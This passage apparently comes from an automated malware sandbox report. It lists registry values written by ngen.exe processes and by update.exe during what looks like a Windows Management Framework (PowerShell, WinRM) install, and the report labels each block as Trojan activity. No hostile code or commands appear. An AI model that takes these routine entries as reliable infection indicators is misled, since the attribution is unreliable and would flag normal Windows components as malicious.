[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:3436 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 29 A0 0C B7 6D CA 61 CF 2B 8E 39 A0 3A 05 D3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

The process ngen.exe:3940 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 66 81 B0 B4 27 25 80 D2 DB AE E7 6E 9C 45 20"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3488 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 69 BD E2 92 23 0B CF AA EC F9 61 05 DA F5 E2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:3932 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 52 31 86 62 CD 74 19 4F FE D1 43 BE 0F 9F 79"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3520 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F EF 1A 04 EA 81 8F 3B 4D 55 6A 17 52 FA 7C C2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3528 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 3C 98 1F 1E 17 FA 1C 72 A6 EB 75 2D 27 6F 88"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3544 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 AB 6D 31 06 F7 B2 6F 9A 37 22 55 71 51 9A 9F"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3560 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 AC 32 63 9E AB CF 48 1E 69 A2 3E 9F 88 DE 0E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:3428 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 67 42 8C 82 D4 83 A5 AC C4 6D B9 B5 01 0F 96"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3460 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E 7C 41 7A 5A AE 20 0F 53 2A C9 90 96 3C 3E D3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

The process ngen.exe:3376 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 2D 62 51 AD 5E 75 23 68 0E 78 7E F4 AB 6F 37"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:3568 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 17 CC 65 2D 02 5D 6C 77 94 F8 C1 87 C7 44 FA"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3444 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 1E 81 ED 92 06 EC D6 E0 D4 15 84 97 53 8B DE"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process update.exe:1716 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"

[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"

[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"

[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"

[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"

[HKCR\.ps1xml]
"PerceivedType" = "Text"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathIISHelp" = "%WinDir%\Help\iishelp"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"

[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"

[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"

[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathInetsrv" = "%System%\inetsrv"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"

[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"

[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "7/16/2015"
"ReleaseType" = "Software Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

